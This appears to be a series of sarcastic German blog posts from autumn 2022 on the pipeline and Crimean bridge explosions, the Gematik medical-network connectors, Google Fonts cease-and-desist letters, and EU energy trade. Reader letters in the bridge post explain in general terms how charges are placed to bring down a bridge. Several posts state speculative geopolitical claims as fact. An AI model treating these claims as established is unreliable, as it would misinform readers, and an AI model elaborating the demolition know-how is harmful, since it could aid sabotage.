Die russische Regierung hatte in ihren Anschuldigungen auch Großbritannien mitverantwortlich für die angeblichen Angriffe auf die russische Schwarzmeer-Flotte gemacht. Überdies sei Großbritannien auch an den „Nord Stream“-Explosionen Ende September beteiligt gewesen, hieß es aus dem russischen Verteidigungsministerium. Das wurde von London empört zurückgewiesen.
Wohlgemerkt: Die Briten dementieren nur die Pipeline-Nummer, nicht die Schwarzmeer-Vorwürfe. So und jetzt kommt der Grund, wieso ich das verlinke:
Die britische Marine besitzt gar nicht die Fähigkeit, die Gasleitungen zu sprengen“, sagte der frühere Royal-Navy-Admiral Chris Parry dem Sender Sky News.
Wait ... what!?!?
HAHAHAHAHAHA OMG (Danke, Sebastian)

Tue Oct 18 2022

[l] Falls jemand von euch noch Google Fonts einbettet: Da läuft seit geraumer Zeit eine fette Abmahnwelle. Von, wie ich hörte, denselben schmierigen Leute, die wegen Kochbildern, fehlender Creative-Commons-Attribuierung, Google Analytics, Pornos und Raubkopien abgemahnt haben.
Dass das nicht mal irgendeine Regierung einfach abdreht, diesen Abmahn-Geldhahn, das verstehe ich echt nicht. Einfacher kann man gar nicht ganze Bevölkerungsschichten vor unnötigem Schaden schützen.
Das war jetzt gefühlt Dutzende von Malen auf Heise und Golem und die zugrundeliegende Entscheidung hatte ich im Blog. Also bitte. Keine Fonts von Google einbetten. Lieber eine lokale Kopie davon machen.
Update: Ich höre gerade, dass es sogar Betrugsmaschen gibt jetzt dazu. Da kommt dann eine Abmahnung rein, und der Briefkopf sieht aus wie von einer echten Kanzlei, aber die Kontonummer geht zu einem Mule mit ähnlichem Namen. Wenn man also eine Abmahnung kriegt, dann nicht einfach die Telefonnummer aus dem Briefkopf anrufen sondern die Kanzlei googeln und dort die Telefonnummer herholen.
[l] Die Amerikaner werden langsam ungeduldig.
So geht das nicht weiter hier. Was ist denn das für eine Zahlungsmoral? Die Ukraine hat nicht genug Geld, die von den Amerikanern geleasten (!) Waffen zu bezahlen!!
Hey, ich hab ne Idee. Die EU kann das doch zahlen!1!!
Nein, wirklich. Während Deutschland und der Rest der Welt der Ukraine Waffen schenkt, haben die Amis Leasing gemacht. Also … Waffen verkauft und noch die Finanzierung per Kredit übernommen. Und jetzt wo die Ukrainer völlig überraschend zahlungsunfähig sind, da haben die Amis die Stirn, die EU zu säckeln, sie sollen mal der Ukraine Geld geben, damit die ihre Rechnungen bei den Amis begleichen kann.
Un-fucking-glaublich.
Ja aber warte, Fefe, hat die Ukraine nicht feste Einnahmen von Russland für den Gastransit? Aber ja! Nur dann hat die Ukraine folgendes gemacht:
Naftogaz trägt vor einem Schiedsgericht einen Streit gegen den russischen Gazprom-Konzern aus. Gazprom wies am Dienstag alle Zahlungsansprüche von Naftogaz zurück. Wie Reuters berichtet, droht Russland dem ukrainischen Gasversorger mit Sanktionen. Diese würden dazu führen, dass die Ukraine ihre lukrativen Transitgebühren verliert, wodurch der Staatshaushalt weiter erheblich belastet würde.
Taktisch und strategisch brillant, diese Ukraine! Sägt den Ast ab, auf dem sie sitzen!
Aber komm, die EU ist ja blöde genug. Die haben bisher immer Ja und Amen gesagt, wenn der transatlantische große Bruder was wollte, die werden auch weiterhin Zahlmeister spielen für den amerikanischen Proxykrieg gegen die Russen.

Mon Oct 17 2022

[l] Ich rege mich ja seit echt vielen Jahren über Compliance-Theater auf. So viel, dass ich schon versucht habe, einfach nicht hinzugucken, um den Blutdruck zu schonen. Aber hilft ja alles nichts.
Aktuell gibt es mal wieder ein tolles Beispiel. Und zwar hat ja der Bund in seiner unendlichen Weisheit entschieden, dass Ärzte, die schon mit der Fortbildung auf ihrem eigenen Gebiet überfordert sind, jetzt auch Computerspezialisten werden und an eine "Telematik-Infrastruktur" angeschlossen werden sollen.
Idee: Wir digitalisieren das Gesundheitswesen!
Problem: Die Ärzte können das nicht. Die wollen und sollen das auch nicht können. Wenn ich die Wahl habe, ob mein Zahnarzt seine Zeit für Fortbildung in Zahnarzt-Themen oder für Fortbildung in IT-Themen investiert hat, werde ich natürlich immer den Zahnarzt nehmen, der sich in seinem Fach weitergebildet hat. Die ganze Idee ist schon beschissen.
Aber gut. Also wurde eine Firma namens Gematik beauftragt, und da sitzen dann lauter Bürokraten drin, deren einzige Sorge war, am Ende an irgendwas Schuld zu sein. Also haben sie sich für Fundamentalismus entschieden. Aber nicht Fundamentalismus wie "das ist eine grundsätzlich schlechte Idee, das machen wir nicht" sondern Fundamentalismus wie "wir werden da jetzt soviel Compliance-Theater drauf, wie wir nur können".
Das Highlight war vor vielen Jahren, dass die ernsthaft mit "beschlagnahmesicheren Käfigen" geworben haben. Da stehen die Server in den Rechenzentren drin. In Käfigen, damit Behördenwillkür nicht einfach so zum kompletten Datenverlust führt, sondern die sich erstmal durch die Käfige beißen müssen.
Da hätte man auch sagen können: Hervorragender Punkt. Daten so zentral zu sammeln ist eine grundsätzlich beschissene Idee, das machen wir nicht. Irgendein Arschloch wird immer kommen und darauf zugreifen wollen. Irgendein Vorwand wird sich schon finden. Ein Kindermörder soll per DNA-Abgleich identifiziert werden oder sowas. Wer kann da schon nein sagen? Und schon ist das Fluttor offen.
Aber nein, haben sie natürlich nicht gemacht. Dann wären sie ja nicht bezahlt worden. Stattdessen haben sie da beschlagnahmesichere Käfige beworben und Krypto gesprenkelt, und dann meinte jemand: Ja aber können wir denn deren Internet einfach so trauen?! Nein, natürlich nicht! Also geben wir ihnen VPN-Endpunkte. Aber nicht irgendwelche, nei-hein! Wir geben ihnen zertifizierte Bullshit-Theater-Endpunkte!
Wer macht sowas in Deutschland? U.a. Secunet. Sowas wird sonst zum Vernetzen von Botschaften eingesetzt. Daher ist Teil von solchen Geräten, dass sie versuchen sollen, sich Angreifern mit physischem Zugriff zu widersetzen.
Diese Idee gibt es häufiger, aber sie war schon immer Schwachsinn. Mein Lieblingsspruch zu dem Thema ist von Peter Gutmann, der mal meinte: Die einzige tamperproof hardware, die es gibt, ist Voyager 1. Weil die inzwischen ausreichend schwierig physisch zu erreichen ist für Angreifer.
Egal. Gegen Angreifer mit physischem Zugriff kannst du dich nicht sinnvoll wehren. Du kannst sie ärgern und aufhalten, aber wehren geht nicht. Das wussten die Ingenieure natürlich, und sie wussten auch, dass sie hier nicht an einer Atombombe arbeiten, die in Feindeshand fallen könnte und dann nicht explodierfähig sein darf, sondern an einem stinkenden VPN-Tunnel. Also haben die gemacht, was Ingenieure leider immer machen in solchen Fällen: Sie haben Bullshit-Theater gemacht. Sie haben Krypto drübergesprenkelt, damit es sicher riecht. Aber weil das Teil natürlich booten können soll, ohne dass der Arzt einen 128stelligen Code eingibt, liegt der Schlüssel für die Krypto-Simulation daneben. Mit der "Lösung" können alle leben.
Der Chef kann sagen: Wir haben doch Krypto gesprenkelt!
Das BSI zertifiziert das, weil Dateisystem ist verschlüsselt!1!!
Der Kunde kriegt ein Häkchen für seine Checkbox, deren Sinn er eh die ganze Zeit nicht verstanden hat.
Und der Arzt kann das benutzen, ohne irgendwas davon verstanden zu haben, und (hoffentlich) ohne dass das unsicherer ist als es ohne das Theater gewesen wäre.
Aber wenn wir genau hingucken, stellen wir fest, dass wir hier eine Security-Zusage gemacht haben. Von der wir die ganze Zeit wussten, dass sie nicht einhaltbar ist. Eines Tages kommt also ein missratener Teenager und hackt das mit primitivsten Mitteln auf (denn der Schlüssel liegt ja wie gesagt daneben!). So ist das gerade mit den "Konnektoren" in den Arztpraxen geschehen. Abwehren von Angreifern mit physischem Zugriff war die ganze Zeit keine reelle Anforderung, denn wieso würde der Arzt seinen Konnektor hacken oder da Patienten ranlassen?! Und wenn jemand in die Praxis einbricht, dann kann der da das Papier raustragen und muss nichts hacken.
Aber jetzt kommt ein Winkel dazu. Und zwar haben die so viel Bullshit-Security-Theater über das Projekt gesprenkelt, dass "die Hardware veralten" kann. Die veraltet natürlich nicht wirklich, sondern das Bullshit-Theater-Zertifikat läuft aus. Es gibt keinerlei inhaltliche Sachgründe hinter irgendwas davon. Das war von vorne bis hinten Bullshit.
Aber wartet. Der missratene Teenager hat als Demo für seinen Hack gezeigt, dass man damit auch X.509-Zertifikate erneuern kann. Auf den Boxen. In Software. Ja, äh, natürlich kann man das. Wer würde denn Boxen bauen, wo man das nur per Hardwaretausch machen kann? Nun, wie sich rausstellt: Gematik und ihre Zulieferer. Nur waren sie dabei eben inkompetent, weil das eh sinnlose Compliance-Theater-Anforderungen waren, die die Ingenieure also auch nur Compliance-Bullshit-Theater-mäßig "umgesetzt" haben.
Tja und jetzt stehen alle Seiten peinlich berührt in der Gegend rum. Die Hersteller können nicht erklären, wieso man das doch tauschen kann, oder wieso sie das verhindern wollten. Gematik kann nicht erklären, wieso das überhaupt in den Anforderungen landen konnte. Und niemand kann erklären, wieso das eh finanziell kurz vor dem Kollaps stehende Gesundheitssystem jetzt 300 Millionen zahlen sollte, um unnötig Geräte zu tauschen, wenn ein Softwareupdate gereicht hätte.
So hat dann Berichten zufolge einer der Hersteller sich verleugnen lassen und ging nicht mehr ans Telefon und die Gematik findet die eine Äußerung, mit der sie ihren Griff ins Klo noch vertiefen konnten: Ach komm, Atze, lass uns mal trotzdem die Hardware tauschen!1!!
Darf ich nochmal darauf hinweisen, dass nichts davon sachlich oder technisch begründet ist. Das war alles Compliance-Flipper zwischen in Inkompetenz festgekalkten Behörden und Institutionen. Wenn ich mir was wünschen dürfe, würden die alle gefeuert und müssten ihre Gehälter für die letzten Jahre zurückzahlen. Unfassbar.
Update: Bei der Gelegenheit möchte ich auch noch auf den Umstand hinweisen, dass man überhaupt gar keine Konnektoren braucht. Die erfüllen keinen Zweck. Ein VPN macht Transportverschlüsselung und Authentisierung. Die macht beides auch TLS.
Update: Ja aber Fefe, bei der Box kann der Trojaner auf dem Windows-Rechner aber doch die Schlüssel nicht klauen! Das ist doch viel sicherer! Ja, äh, wieso soll der Angreifer denn die Schlüssel haben wollen, wenn die Box ihn auf Zuruf mit der Telematik-Infrastruktur verbindet? Hier wird ein Problem gelöst, das niemand hatte. Mit anderen Worten: Das ist Bullshit-Theater.

Sat Oct 15 2022

[l] So es gibt jetzt die ersten Leaks von Traumazone, der neuen Collage von Adam Curtis, und die hat mich ja mal wie ein Schlag in den Magen getroffen, muss ich euch sagen.
Gut, Videos aus der Zeit aus Westberlin waren auch nicht gerade von Reichtum, Wohlstand und Moderne geprägt, aber die geradezu niederknüppelnde Armut, die man da aus Russland sieht, die hat in mir eine unangenehme Fragen aufgeworfen. Erstens Mal: Vor DENEN hatten wir Angst? Dass die uns angreifen würden? DIE waren die Begründung für unsere Wehrpflicht?!?
Ich meine, gut, auf einer gewissen Ebene war ja schon die ganze Zeit klar, dass wir belogen werden, dass sich die Balken nur so biegen. Aber das Ausmaß der Lüge hat mir jetzt doch weiche Knie gemacht.
Zweitens: Es gibt da (ich habe bisher nur Teile der 1. Folge geguckt) eine herzzerreißende Szene, in der eine Mutter ihren Sohn verabschiedet, der seine zwei Jahre Wehrdienst ableisten muss. Dann: Cut, Afghanistan. Russen im Kreuzfeuer, russische Hubschrauber mit von der CIA gelieferten Stinger-Raketen runtergeholt. Sich ergebende Russen im Kreuzfeuer. Tote. So viele Tote.
Die Szene hat mich echt getroffen.
Auch sehr eindrucksvoll ist die Liste der Dinge, abgesehen von dem Zerbröseln ihrer Volkswirtschaft, die ihnen da zwischen den Fingern explodiert sind. Tschernobyl, Pipelineexplosionen, der desaströse Afghanistankrieg. Gut, das ist jetzt natürlich die Zusammenstellung von Curtis, der an keiner Stelle irgendwelche imperialen Absichten auch nur andeutet. Das fühlt sich alles an wie ein Volk, das einfach nur ein nicht völlig beschissenes Leben führen wollte. Genau wie wir.
Curtis stellt es so dar, als ob der eigentliche Grund für den Fall der Sowjetunion und das Übel danach gar nicht die Misswirtschaft der Sowjetunion vor Gorbatschow war, sondern Gorbatschows Perestroika-Politik, die dazu geführt hat, dass Kriminalität die Gesellschaft und Industrie komplett zerfressen hat.
Wenn ihr diese Videos irgendwo findet, kann ich nur nochmal eine Empfehlung aussprechen. Absolut erschütternde Zeitdokumente.

Fri Oct 14 2022

[l] Wir hatten ja vor einer Weile den Joke hier, dass praktisch jedes Land glaubt, eine "besondere Beziehung" mit den Amerikanern zu haben. Wenn man aber genauer hinguckt, liefert am Ende so gut wie niemand so zuverlässig wie die Schweden. Und die sind nicht mal in der Nato bisher!
Was haben die geliefert! Julian Assange, Pirate Bay, die Estonia, die "russische U-Boote vor unserer Küste"-Nummer haben sie mitgemacht. Perfekter Partner für die USA! Die Amis sagen: Hüpf! Die Schweden fragen: Wie hoch?
Und jetzt wieder. Schweden schließt seine Ermittlungen zu den Pipelinelöchern ab, hat alle Beweise weggetragen und sonst niemanden gucken lassen, und findet jetzt, das sei alles zu sensibel, um es mit der Öffentlichkeit oder "Partnern" zu teilen. Außer den Amis, vermute ich mal. Wobei. Mit denen muss man das nicht teilen. Die wissen ja, was passiert ist. Die wussten es vermutlich vor den Schweden.

Thu Oct 13 2022

[l] Arzt vergewaltigt betäubte Patienten? Furchtbar.
Aber immerhin waren die nicht minderjährig!
Wie in diesem anderen Fall im Saarland.
Das funktionierte über Jahre, bis durch einen Zufall die Eltern eines zehnjährigen Jungen erfahren, dass ihr Sohn in einer polizeilichen Akte als sexuell missbrauchtes Kind geführt wird. Es stellt sich heraus, dass den Eltern jahrelang verschwiegen wurde, dass ihr Kind von einem Arzt bei Behandlungen mutmaßlich missbraucht wurde.
Alle haben sie geschwiegen. Die Ärzte, das Krankenhaus, die Verwaltung, die Polizei und die Justiz.
Das Krankenhaus war übrigens ein Landeskrankenhaus. Vermutlich wäre das eher ans Licht gekommen, wenn es der katholischen Kirche gehört hätte. So krass ist die Lage, dass wir erst die katholische Kirche zu Glasnost zwingen, bevor die Skandale im Staat auffliegen.
War übrigens auch kein Einzelfall, nicht mal an der Klinik!
Unsere Recherchen ergeben, dass auch in einer weiteren Klinik des UKS, der Hals-Nasen-Ohren-Klinik junge Patienten mutmaßlich sexuell missbraucht worden sind. Eltern entdecken klaffende Wunden im Intimbereich ihrer Kinder.
Aber keine Sorge. Ist alles im Griff jetzt.
Das Universitätsklinikum hat inzwischen reagiert und ein sogenanntes Schutzkonzept erarbeitet. Über eine Homepage des Krankenhauses können Missbrauchsfälle jetzt online angezeigt werden.
Damit man die Opfer besser verwalten kann!1!! Nachdem man ihnen gesagt hat, dass man leider leider keine Fortschritte beim Ermitteln des Täters gemacht hat.

Tue Oct 11 2022

[l] Im Moment diskutiert die ganze IT-Security-Branche über Schönbohm. Der sich herauskristallisierende Konsens ist (meiner Beobachtung nach):
Ja, der Schönböhm ist ein Cyberclown. Aber er war wenigstens ein berechenbarer Cyberclown. Wir wussten, woran wir waren. Der hat zwar nicht viel gemacht, aber immerhin stand er auch nicht viel im Weg herum oder hat da erratisch wichtigen Projekten in den Rücken gedolcht. Im Vergleich zu den Vollversagern im BMI und der Politik ist der Mann geradezu GOLD!1!!
Den Kommentar von Jürgen Schmidt hatte ich ja schon verlinkt, hier noch mein geschätzter Kollege Manuel Atug. Money Quote:
ein gutes Duo mit überdurchschnittlicher #Digitalkompetenz, gemessen an den sonstigen Akteuren.
Eine humoristisch sehr schöne Formulierung. "Klar kann der nichts aber hast du mal das restliche Gruselkabinett gesehen?!" :-)
Wir müssen da glaube ich trennen zwischen inhaltlichen Punkten und taktischen Erwägungen. Inhaltlich ist der Schönbohm meiner Beobachtung nach eine absolute Lusche. Der rennt zu allen Veranstaltungen, kommt denn 5 Minuten zu spät, damit alle mitkriegen, wie wichtig er ist, dann lässt er ein paar Wortblasen ab, dass Sicherheit ja wichtig sei, und seine Behörde tut absolut nichts für Vorbeugung. Die verkaufen lieber wertlose Zertifikate, empfehlen Schlangenöl und machen Blockchain-Kram und SSI-Blödsinn.
Der Mann betreibt seine Behörde wie Junior-Entwickler ihren Lebenslauf! Springen auf jeden Hype auf, machen dann schlechte Projekte, die sie mangels Erfahrung verkacken, und feiern sich dann als Experten und verweisen auf ihre "Erfahrung".
Hat er das BSI vorangetrieben, wie Honkhase behauptet? Wenn man das nach Bürokratie-Metastasierung misst, dann vielleicht. Inhaltlich sicher nicht.
Finde ich, dass der Schönbohm wegen der KGB-Firma zurücktreten sollte?
Nein. Das ist an den Haaren herbeigezogen.
Ich finde, er sollte gehen, weil er schlechte Arbeit macht.

Sun Oct 9 2022

[l] Zu dieser Brückengeschichte merken jetzt Leser an, dass es sich um eine "Leichtmetallkonstruktion" gehandelt habe, also nicht aus Stahlbetonteilen zusammengesetzt sondern sozusagen ein "schnelles Provisorium" und daher könne das schon sein, dass die nicht so stabil sei wie es eine "richtige" Brücke gewesen wäre.
Das kann ich nicht beurteilen. Aber folgender Leserbrief eines Statikers mit Brückenerfahrung hilft weiter:
Die Brücke ist eine Kette von Stahlbrücken als Hohlkasten auf Betonpfeilern. Der größte Feind ist da das Feuer. Bei einem Brand verliert so eine Hohlkastenbrücke wesentlich die Tragfähigkeit oberhalb 400°C und bei entsprechender Ausdehnung des Brandes. Normalerweise werden bei uns aus diesem Grund bei einem Brand auf einer Brücke alle erdenklichen Maßnahmen eingeleitet um den Hohlkasten aus Stahl zu kühlen und die Feuerwehr sieht zu dass schnell die Brandursache von der Brücke runterkommt.
Eine reine Stahlbrücke lässt sich sehr sehr schlecht sprengen. Das beschränkt sich dann meistens auf die Pfeiler.
[…] ein Hydrocarbonbrand ist für mich als sachkundiger Fachmann absolut plausibel.
OK. Dann ziehe ich meine Analyse zurück und behaupte das Gegenteil.
Ein anderer Leserbrief zum Thema:
zu Deinem Verständnis einer Sprengung einer Brücke eine kurze Anmerkung. Eine Explosion hat immer zwei Wirkungsrichtungen. Zuerst expandiert etwas sehr schnell und verdrängt hierdurch ein anderes Medium. Anschließend kommt es in dem durch die schnelle Expansion entstandenen Hohlraum jedoch zu einer Kontraktion, die der Expansionsrichtung entgegengerichtet ist. Beste visuelle Anschauung: Die pilzförmige Wolke bei einer Kernwaffenexplosion. Diese entsteht durch den Unterdruck nach der Explosion. Die nach oben aufsteigende heiße Luft zieht Masse vom Boden nach oben.
Es gibt eine Reihe von Waffen, die auf der Wirkung des Unterdrucks nach einer Explosion aufbauen, nicht auf der Wirkung des Drucks. Hier sind das insbesondere Aerosolbomben, die viel Sauerstoff konsumieren und hierdurch gezielt einen Unterdruck erzeugen, der gegen Druck gesicherte Objekte zerstören kann und soll. Eine Drucktür wird quasi aus der Verankerung gezogen bzw. die Luftfilter in Bunkern werden zerstört, da diese zwar gegen Überdruck und Unterdruck einer „Normalexplosion“, selten jedoch gegen gezielt eingesetzten Unterdruck einer „Unterdruckbombe“ gesichert sind.
Zur Krim-Brücke:
Entscheidend ist der Impuls, der auf die Fahrbahnlager wirkt, um die Fahrbahnteile aus diesen Lagern zu heben und damit idealerweise zum Absturz zu bringen. Wenn man keine kleineren Sprengladungen (mehrere Kilogramm bis mehrere hundert Kilogramm) in speziellen Sprengkammern anbringen bzw. keine Schneidladungen nutzen kann, dann braucht man eben mehr Sprengstoff, um auf eine bestimmte Stelle einen bestimmten Impuls wirken lassen zu können, um die Konstruktion zu überlasten. Wenn 90% der Explosionswirkung nach oben „verpuffen“, dann muss man eben die Menge des eingesetzten Sprengstoffs erhöhen. Einfache Physik.
Und das wurde hier gemacht. Statt ein paar Taucher mit ein paar Kilogramm Sprengstoff hinzuschicken und die Lager zu zerstören, hat man deutlich mehr Sprengstoff eingesetzt, um die Brücke von oben zu überlasten. Denn erheblicher punktueller Druck von oben führt zu einer (elastischen) Verformung der Fahrbahn nach unten => diese schwingt danach jedoch wieder aus und wird dadurch aus den Lagern gehoben bzw. zerstört diese beim Zurückfallen in die Normalposition. Denn es fehlt einer Brücke ja in der Regel die Sicherung der Bauteile nach oben. Die Fahrbahnteile liegen lose auf den Lagern.
Sekundäreffekt dieses Terroranschlags: lange Feuer. Der Versuch, über die brennenden Kesselwagen des Güterzuges ein langanhaltendes Feuer zu erzeugen, welches den Beton spröde werden läßt und den im Beton eingebetteten Stahl schädigt, war in der Theorie der Anschlagsplanung für die Entscheider sicherlich ganz überzeugend. Da hat dann wohl aber niemand mit Energiemengen gerechnet. Also wie hoch ist die Energiemenge in einem Kesselwagen und welchen Anteil diese Energie kann ein Feuer in die Konstruktion einbringen? Tip: reicht nicht, denn dafür sind Brücken (im Idealfall) ausgelegt, dass ein Brand auf ihrer Fahrbahn diese nicht zum Einsturz bringt und zur Unbenutzbarkeit beschädigt. Aber wer weiß, wer diese Brücke berechnet hat. ;) Sicher mal wieder nur ein paar Studenten einer Bau-Uni, unter Aufsicht ihres Professors. (Das übliche Verfahren in der RF.)
Dass es bei der Berechnung und dem Bau der Brücke Schlamperei gegeben hat, das siehst Du am Schadensbild. Denn eine Explosion von 40t TNT auf der Fahrbahn hätte die Brücke überstehen müssen, aufgrund ihrer erheblichen strategischen Bedeutung.
Ob die Brücke über den eingestürzten Teil der Autofahrbahn hinaus durch die brennenden Kesselwagen erheblich beschädigt wurde, das werden die nächsten Wochen zeigen. Die RF hat als Show zur Beruhigung der Massen Personenzüge nach ein paar Stunden Unterbrechung des Verkehrs noch am Abend des Anschlags wieder planmäßig über die Brücke fahren lassen (auf einem Gleis, statt auf zwei Gleisen).
Diese Explosion war eine Show-Nummer, von wem auch immer. Weshalb die RF-Sicherheitskräfte wohl auch ein bisschen zu entspannt bei den Sicherheitskontrollen im Vorfeld waren. Weil es in der Theorie dann eben doch mehr als einen 40-Tonner mit TNT braucht, um die Brücke dieser Größe und Bedeutung zu zerstören. In der Praxis haben wir aber gesehen, dass die Bauausführung oder deren ihr zugrundeliegende Berechnung nicht korrekt war und der LKW mit <40t TNT doch gereicht hat, um zumindest einen Teil der Fahrbahn zu zerstören. Das ist die eigentliche Überraschung (für die RF).
Und ja, das war eine Explosion auf der Fahrbahn. Kannst Du am Schadensbild sehen. Eine Explosion von unten hätte nicht die Leitplanken auf der Parallelfahrbahn weggerissen und die Geländer am Laufsteg unter der Fahrbahn heil gelassen. Eine Explosion von unten hätte ein invertiertes Schadensbild zu einer Explosion von oben.
Du kannst Dir ja mal die Schadensbilder der Antoniwkabrücke nach Beschuss angucken. Es braucht eine Menge Energie, um eine Brücke zu zerstören, die insbesondere so gebaut wurde, dass sie im Kriegsfall weiterhin benutzbar ist.
Was bei der Explosion auf der Krim-Brücke (wieder einmal) offensichtlich wurde ist die alltägliche Schlamperei bei Menschen, die sich für toll und besser halten. Erst wurde der LKW schlampig kontrolliert und dann trifft dieser auf eine schlechte Bauausführung in Kombination mit ungenügender Sicherheitsmarge bei der Konstruktion. Naja.
Und auch ein Dritter Leser mit Sprengerfahrung stützt die Theorie mit dem LKW:
Bin selber Sprengberechtigter und kann da vll etwas Klarheit reinbringen:
Ja, Brücken halten normale Drucklasten von oben am Besten aus. Eine Sprengladung erzeugt aber eine Detonationswelle, die einem ganz anderem Wirkungsmechanismus hat als "Gewicht liegt drauf". Da können schnell elementare Schäden und Zerstörungen entstehen.
Eigentlich stimmt das was du schreibst - das man die Ladungen so platziert, dass sie möglichst effizient wirken. Und auch Schneidladungen einsetzt, die gezielt und relativ sauber Trennschnitte machen. Aber: So arbeitet man nur, wenn man ein paar Tage Zeit hat und in aller Seelenruhe Löcher bohren, Ladungen platzieren kann etc. Im militärischen Bereich muss man aber oft anders arbeiten, da gibts quasi keine Vorbereitungszeit. Also geht man da nach der Methode "Viel hilft viel" vor, und platziert einfach direkt auf der Fahrbahn hunderte Kilo Sprengstoff. Da verpufft ein Großteil der Wirkung in der Umwelt, aber der verbliebene Teil reicht bei DEN Mengen aus, um die Brücke zu zerstören. Gibt in Field Manuals der US Army Berechnungstabellen dazu :)
In so einen LKW passt viel rein, das ist tatsächlich eine sehr gute Quick and Dirty-Methode gegen die die andere Partei kaum etwas ausrichten kann. Ist also gar nicht so unwahrscheinlich, dass das eine Commando- oder Sabotageaktion war.

Tue Oct 4 2022

[l] Die Nato hat übrigens im Juni eine Übung in der Ostsee gemacht. Was für eine Übung? Nun, …
In support of BALTOPS, U.S. Navy Sixth Fleet partnered with U.S. Navy research and warfare centers to bring the latest advancements in Unmanned Underwater Vehicle (UUV) mine hunting technology to the Baltic Sea to demonstrate the vehicle’s effectiveness in operational scenarios.
Experimentation was conducted off the coast of Bornholm, Denmark, with participants from Naval Information Warfare Center (NIWC) Pacific, Naval Undersea Warfare Center (NUWC) Newport, and Mine Warfare Readiness and Effectiveness Measuring (MIREM) — all under the direction of U.S. Sixth Fleet Task Force 68.

Mon Oct 3 2022

[l] Die Referenden reichen ja nicht, da muss auch noch das russische Parlament dafür stimmen. Das haben sie gemacht. Mit mehr Dafür-Stimmen als anwesenden Wahlberechtigten.
*wieher*
Da wird echt Unterhaltungssteuer fällig bei denen. Offiziell ein "technical glitch". Softwarefehler. Kann man nichts machen.

Thu Sep 22 2022

[l] Ist euch eigentlich beim 9€-Ticket aufgefallen, wieviel Stress plötzlich wegfiel?
Selbst im Nahverkehr.
Ich denke da ja seit einer Weile drüber nach, wieso sich das so gut angefühlt hat, und ich glaube ich verstehe es jetzt. Wenn du mir ein Tarifgefüge gibst, mit Zonen und Tagestickets und Mehrfachtickets, und in Berlin gibt es auch noch das Konzept der Kurzstrecke, oder Monatskarte und die wird dann im Abo billiger, dann gibst du mir ein Optimierungsproblem.
Wenn ich das System dann nutze, dann habe ich Schrauben, an denen ich drehen kann, und fange automatisch an, den billigsten Weg auszurechnen. Das heißt aber auch automatisch, dass ich gucke, was ich an meiner Route optimieren kann, um weniger Kosten zu haben.
Die Kurzstrecke in Berlin sind z.B. 3 S-Bahn-Stationen oder 6 Busstationen. Wenn die Kurzstrecke noch eine Wabengrenze kreuzt, lohnt sich das richtig doll. Aber das heißt eben, dass ich nicht nur überlege, wo ich hinwill, sondern ob ich lieber S-Bahn oder Bus nehmen soll, weil es dann eine Kurzstrecke ist.
Und natürlich gibt es noch die Frage der Weiterfahrt. Darf ich unterwegs anhalten, einkaufen, und dann weiterfahren? Zählt das als Kreisfahrt, wenn ich an einer anderen Station (aber in der Nähe) rauskomme?
Diese ganzen Überlegungen fallen mit dem 9€-Ticket sofort weg. Ich würde gerne wo anhalten und mich in ein Restaurant setzen? Kein Problem! Ich muss nicht nachdenken, ob ich schnell essen muss, weil ich sonst vielleicht das Zeitlimit auf dem Ticket kreuze.
Dieser ganze Stress, der da von einem abfällt, den habe ich nie bewusst gemerkt, bis er mit dem 9€-Ticket wegfiel. Ich vermisse das enorm, sage ich euch. Gerade im Urlaub fällt halt ein Gutteil des Urlaubsgefühls weg, wenn man hinten im Kopf irgendwelche Optimierungsprobleme löst. Und das ist ja nichts, was ich bewusst gemacht habe, sondern da hat sich mir ein Optimierungsproblem gestellt, also habe ich es gelöst.

Sat Sep 17 2022

[l] Ein Leser empfiehlt diesen Thread zur Energiewirtschaft in der EU. Achtung: Macht schlechte Laune.
Besonders hart trifft mich ja gerade diese Auflistung der Strom-Im- und -Exporte der EU-Länder seit 2015. Da sieht man mehrere Dinge sehr klar. Erstens: Deutschland ist ein massiver Energieexporteur, soviel war bekannt, aber Europa ist Netto immer noch ein Importeur. Und bei Import reden wir von Strom, nicht von dem Erdgas und dem Öl, aus dem der Strom erzeugt wird. Die sind hier gar nicht betrachtet. Es geht nur um generierten Strom.
Wenn Deutschland also aus der Atomkraft aussteigt, hat das gravierende Auswirkungen auf den Rest der EU, weil dort alle möglichen Länder einfach nie eigene Kapazitäten aufgebaut haben.
Besonders krass finde ich Griechenland. Die haben perfekte Voraussetzungen. Die haben eine Küste für Windkraft, die haben Sonne für Solar, die haben Gebirge für Wasserspeicher. Aber sie haben schlicht nie irgendwas an Infrastruktur gebaut.
So und jetzt werft mal kurz einen Blick auf Spanien, als Kontrast. Die haben bis jetzt immer importieren müssen. Und jetzt exportieren sie plötzlich fast so viel, wie sie in den übelsten Zeiten importieren mussten. Haben die massiv Solar und Wind gebaut oder was ist da los? Sehr beeindruckender Turnaround jedenfalls.
Aber der größte Hasardeur in Europa ist Italien. Die importieren mehr als Deutschland exportiert. Wir reden hier die ganze Zeit über Frankreich und ihre Atomkraftwerke aber im Sachen Bedarf spielen die ja fast gar keine Rolle im Vergleich zu Italien!
Österreich gibt auch eine ganz schwache Figur ab, finde ich. Das ist ein moderner Industriestaat, aber die müssen Strom importieren?!
Aber mal unabhängig vom Fingerzeigen jetzt: Unter dem Strich muss die EU Strom importieren. Nicht nur Erdgas und Erdöl. Strom! Der kommt dann aus Norwegen, Schweden und Großbritannien. Norwegen hat Wasserkraft aber auch dort hat der Klimawandel zu sinkenden Wasserpegeln geführt. Das ist nicht gut für Wasserkraft!
Kurz gesagt: Du kannst auf praktisch jedes Land gucken, und alle haben sie ihre Energiepolitik verkackt. Bis auf Deutschland, wir haben die anderen immer aus dem Morast gezogen, aber jetzt halt nicht mehr ohne die Atomkraftwerke. Das kommt jetzt nicht überraschend, aber die anderen Länder haben alle ein Nickerchen gemacht. Der Markt wird das regeln!
Ja, wird er. Indem bei euch das Licht ausgeht, ihr Deppen.
